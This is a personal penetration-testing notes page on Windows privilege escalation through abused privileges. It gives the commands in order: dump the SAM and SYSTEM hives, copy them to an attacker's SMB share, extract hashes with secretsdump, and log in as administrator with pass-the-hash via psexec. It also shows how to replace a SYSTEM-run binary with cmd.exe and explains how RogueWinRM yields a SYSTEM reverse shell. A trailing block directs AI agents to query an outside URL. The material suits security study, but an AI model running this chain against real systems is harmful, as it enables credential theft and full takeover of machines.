# Abusing privileges **To view the privileges of the current user:** ```powershell C:\> whoami /priv ``` ### SeBackup / SeRestore The `impacket` tool can be used to perform various tasks such as starting a *SMB* server, dumping secrets from hives in the Windows registry, and running commands with `psexec`, among many others. Refer to my `impacket` notes for more information: {% embed url="" %} Suppose we have gained a remote shell on a server with the `SeBackUp` and `SeRestore` privileges ```powershell C:\target> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======== SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled ``` Due to the set privileges, we are able to save the contents of the `SAM` and `SYSTEM` hive registry to a location of our choice (`C:\Users\jarrett\system.hive` and `C:\Users\jarrett\sam.hive` in this case): ```powershell C:\target> reg save hklm\system C:\Users\jarrett\system.hive C:\target> reg save hklm\sam C:\Users\jarrett\sam.hive ``` The command below starts a simple *SMB* server on the attacker machine with a network share named `public` pointing to the `share` directory. This allows us to transfer the files from the target machine to the attacker at a particular share point (`share` folder). ***Attacker machine*** ```bash attacker@attacker_ip:~$ impacket-smbserver -smb2support -username jarrett -password mynamejeff public share ``` The command below copies the content of `system.hive` and `sam.hive` at the specified directory to the share point on the attacker machine. ***Target machine*** ```powershell C:\target> copy c:\users\jarrett\system.hive \\\public\ C:\target> copy c:\users\jarrett\sam.hive \\\public\ ``` **The next few commands should be ran from the attacker machine** The command below dumps the hashes from the `sam.hive`and `system.hive`files present on the current folder (specified by the `LOCAL` target option). ```bash attacker@attacker_ip:~/share$ ls sam.hive system.hive attacker@attacker_ip:~/share$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL Impacket vxxx - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: ... [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) ...::: Guest:xxx:xxx:xxx:: Administrator:xx12xx:xx34xx:: ... ``` The command below uses the hashes found from the `impacket-secretsdump` command above, to authenticate as the ***administrator*** user. This provides us with a remote shell as the *administrator* user on the target Windows machine ```bash attacker@attacker_ip:~/share$ impacket-psexec -hashes xx12xx:xx34xx administrator@10.10.x.x ... C:\Windows\system32> ``` ### SeTakeOwnership This permission allows a user to take ownership of any object on the system, including files and registry keys. ```powershell C:\> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ======================================== ======== SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled ... ``` Suppose we have found a service on the target system that executes an`.exe`file with `SYSTEM` privileges (an example would be `utilman.exe`). Let's name that file `rand.exe`. Due to our `SeTakeOwnership` privilege, we are able to take ownership of that file with the command below: ```powershell C:\> takeown /f C:\Windows\System32\priv.exe ``` At this point, we are able to provide ourselves any privileges we need over the file. The command below gives our current user (*jarrett*) full access`(F)`to the `priv.exe` file at the specified location. ```powershell C:\> icacls C:\Windows\System32\priv.exe /grant jarrett:F ``` Finally, we can copy any file of choice to the target file we have full access to: > Take note to be in the correct file directory when using the terminal, or optionally provide the correct path The command below copies the `cmd.exe` file to`priv.exe:` ```powershell C:\Windows\System32\> copy cmd.exe priv.exe ``` This provides us with a command prompt with `SYSTEM` privileges whenever the particular service mentioned above is started. {% embed url="" %} ### SeImpersonate / SeAssignPrimaryToken * `SeImpersonate`: Privilege that allows a user to impersonate another user’s security context * `SeAssignPrimaryToken`: Privilege that allows assignments of a new security token to a process. This allows that process to impersonate a higher-privileged user (such as `SYSTEM`). Breakdown of how the `RogueWinRM` exploit tool works (As of time of writing, I wasn't able to find a comprehensive technical guide on how it works. However, I have pieced together the key points from research on the main concepts involved in this exploit): 1. The Background Intelligent Transfer Service (*BITS*) is started, which automatically initiates a connection to port 5985 (used by *WinRM*) using `SYSTEM` privileges. * Port 5985 is typically used for the *WinRM* service, which is simply a port that exposes a *Powershell* console to be used remotely through the network. * The SYSTEM-level authentication credentials can be captured from the above-mentioned connection to *WinRM* on the local target machine (port 5985) 2. The captured authentication credentials can be used to execute a malicious payload of choice (specified as argument to the `RogueWinRM` tool) with SYSTEM-level privileges. This is due the `SeImpersonate` and `SeAssignPrimaryToken` privileges being set on the user on the target machine * A reverse shell connection can be established to a remote attacker server, essentially providing a SYSTEM-level shell {% embed url="" %} {% embed url="" %} BITS service {% endembed %} ***Windows privileges to admin list*** {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking-concepts/privilege-escalation/windows/vulnerabilities-exploit/abusing-privileges.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.